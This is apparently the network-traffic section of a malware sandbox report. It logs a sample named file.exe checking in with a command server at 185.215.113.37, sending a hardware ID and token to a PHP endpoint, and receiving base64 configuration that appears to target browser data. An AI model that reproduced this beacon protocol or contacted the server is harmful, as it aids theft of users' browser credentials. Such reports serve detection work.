Sep 27, 2024 04:14:16.220434904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220434904 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220585108 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220602036 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220618963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220630884 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220642090 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220643997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220643997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220653057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220663071 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220674992 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220685005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220689058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220689058 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220695972 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220704079 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220705986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220716953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220726967 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220736980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220742941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220742941 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220746994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220757961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220768929 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220771074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220778942 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220791101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220802069 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220803022 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220812082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220819950 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220824003 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220834970 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.220850945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220850945 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.220902920 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221442938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221453905 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221463919 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221473932 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221484900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221493959 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221498966 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221504927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221514940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221529961 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221537113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221537113 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221540928 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221550941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221555948 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221561909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221574068 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221585035 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221591949 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221601963 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221611977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221622944 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221632957 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221637964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221637964 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221645117 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221653938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.221678972 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.221688986 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.287329912 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.292349100 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509645939 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509674072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509685993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509706020 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509716988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509728909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509752035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509752035 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509792089 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509803057 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509813070 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509823084 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509835005 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509850979 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509881020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509898901 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509898901 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.509931087 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.509959936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510019064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510019064 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510098934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510109901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510121107 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510130882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510142088 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510150909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510150909 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510152102 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510164022 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510199070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510199070 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510314941 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510325909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510335922 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510358095 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510406971 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510446072 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510457993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510468006 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510477066 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510481119 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510495901 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510503054 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510505915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510516882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510526896 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510533094 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510535955 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510545969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510561943 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510571957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510571957 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510572910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510582924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510586023 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510634899 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510891914 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510902882 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510912895 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510922909 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.510951042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510951042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.510987997 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511024952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511034966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511045933 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511054993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511077881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511077881 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511118889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511145115 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511153936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511169910 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511179924 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511189938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511202097 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511208057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511208057 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511213064 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511255980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511255980 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511394024 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511406898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511416912 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511439085 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511456966 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511461020 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511467934 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511472940 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511477947 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511482954 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511492014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511501074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511501074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511507988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511518002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511528969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511538029 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511542082 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511542082 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511549950 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511560917 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511570930 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511573076 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511581898 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.511601925 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.511620998 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.512053013 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512063980 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512073994 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512084007 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512094975 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512101889 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.512103081 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512115002 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512125969 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512136936 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:16.512145042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.512145042 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.512173891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:16.512173891 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:17.320683956 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:17.320729017 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:17.325542927 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:17.325556993 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.242317915 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.242424965 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:18.508239031 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:18.654505014 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.874727964 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.874743938 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.874756098 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:18.874785900 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:18.874819994 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:18.877620935 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:18.882477045 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107680082 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107707977 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107717991 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107728958 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107738972 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107748985 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107759953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107780933 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.107861996 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.107933044 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107959986 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107970953 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:19.107974052 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.107995987 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.108009100 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.391930103 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:19.396927118 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:20.101437092 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:20.101494074 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:20.131342888 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:20.136521101 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:20.356175900 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:20.356242895 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:20.357491016 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:20.362771988 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:21.082492113 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:21.082726002 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:26.074332952 CEST	80	49704	185.215.113.37	192.168.2.5
Sep 27, 2024 04:14:26.074446917 CEST	49704	80	192.168.2.5	185.215.113.37
Sep 27, 2024 04:14:26.267235041 CEST	49704	80	192.168.2.5	185.215.113.37

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 27, 2024 04:14:44.684724092 CEST	53	51651	162.159.36.2	192.168.2.5
Sep 27, 2024 04:14:45.193880081 CEST	53	58888	1.1.1.1	192.168.2.5

HTTP Request Dependency Graph

185.215.113.37

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	185.215.113.37	80	6132	C:\Users\user\Desktop\file.exe

Timestamp	Bytes transferred	Direction	Data
Sep 27, 2024 04:14:03.419228077 CEST	89	OUT	GET / HTTP/1.1 Host: 185.215.113.37 Connection: Keep-Alive Cache-Control: no-cache
Sep 27, 2024 04:14:04.138974905 CEST	203	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Sep 27, 2024 04:14:04.142781973 CEST	412	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKKFIIEBKEGIEBFIJKFI Host: 185.215.113.37 Content-Length: 211 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 34 46 41 45 46 32 34 42 44 33 42 33 30 32 33 30 31 31 38 35 39 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 61 76 65 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4b 46 49 49 45 42 4b 45 47 49 45 42 46 49 4a 4b 46 49 2d 2d 0d 0a Data Ascii: ------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="hwid"04FAEF24BD3B3023011859------JKKFIIEBKEGIEBFIJKFIContent-Disposition: form-data; name="build"save------JKKFIIEBKEGIEBFIJKFI--
Sep 27, 2024 04:14:04.392410994 CEST	407	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 180 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 4f 54 6c 6d 5a 57 45 77 4f 54 67 34 5a 6a 59 78 59 7a 56 69 4d 57 56 6d 5a 47 4e 6a 4f 44 6c 6c 4f 44 59 35 4d 47 55 35 4d 54 63 33 59 6a 49 33 5a 47 59 33 59 7a 41 31 4e 44 4a 6b 5a 6a 49 30 4e 6a 52 6a 4d 57 45 31 4d 44 6b 34 4d 54 4e 6c 4f 47 55 34 4e 6a 5a 68 4d 54 49 33 4f 44 45 79 66 48 64 72 61 32 70 78 59 57 6c 68 65 47 74 6f 59 6e 78 7a 62 57 70 73 62 47 31 35 62 57 78 69 65 6e 45 75 63 48 64 6b 66 44 42 38 4d 48 77 78 66 44 46 38 4d 58 77 78 66 44 46 38 4d 58 77 78 66 48 6c 69 62 6d 4e 69 61 48 6c 73 5a 58 42 74 5a 58 77 3d Data Ascii: OTlmZWEwOTg4ZjYxYzViMWVmZGNjODllODY5MGU5MTc3YjI3ZGY3YzA1NDJkZjI0NjRjMWE1MDk4MTNlOGU4NjZhMTI3ODEyfHdra2pxYWlheGtoYnxzbWpsbG15bWxienEucHdkfDB8MHwxfDF8MXwxfDF8MXwxfHlibmNiaHlsZXBtZXw=
Sep 27, 2024 04:14:04.409393072 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----EGIDAAFIEHIEHJKFHCAE Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 39 39 66 65 61 30 39 38 38 66 36 31 63 35 62 31 65 66 64 63 63 38 39 65 38 36 39 30 65 39 31 37 37 62 32 37 64 66 37 63 30 35 34 32 64 66 32 34 36 34 63 31 61 35 30 39 38 31 33 65 38 65 38 36 36 61 31 32 37 38 31 32 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 44 41 41 46 49 45 48 49 45 48 4a 4b 46 48 43 41 45 2d 2d 0d 0a Data Ascii: ------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="token"99fea0988f61c5b1efdcc89e8690e9177b27df7c0542df2464c1a509813e8e866a127812------EGIDAAFIEHIEHJKFHCAEContent-Disposition: form-data; name="message"browsers------EGIDAAFIEHIEHJKFHCAE--
Sep 27, 2024 04:14:04.634522915 CEST	1236	IN	HTTP/1.1 200 OK Date: Fri, 27 Sep 2024 02:14:04 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 1520 Keep-Alive: timeout=5, max=98 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 47 4e 6f 63 6d 39 74 5a 53 35 6c 65 47 56 38 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 53 42 44 59 57 35 68 63 6e 6c 38 58 45 64 76 62 32 64 73 5a 56 78 44 61 48 4a 76 62 57 55 67 55 33 68 54 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 59 32 68 79 62 32 31 6c 4c 6d 56 34 5a 58 78 44 61 48 4a 76 62 57 6c 31 62 58 78 63 51 32 68 79 62 32 31 70 64 57 31 63 56 58 4e 6c 63 69 42 45 59 58 52 68 66 47 4e 6f 63 6d 39 74 5a 58 78 6a 61 48 4a 76 62 57 55 75 5a 58 68 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 56 47 39 79 59 32 68 38 58 46 52 76 63 6d 4e 6f 58 46 56 7a 5a 58 49 67 52 47 46 30 59 58 78 6a 61 48 4a 76 62 57 56 38 4d 48 78 57 61 58 5a 68 62 47 52 70 66 46 78 57 61 58 5a 68 62 47 52 70 58 46 [TRUNCATED] Data Ascii: 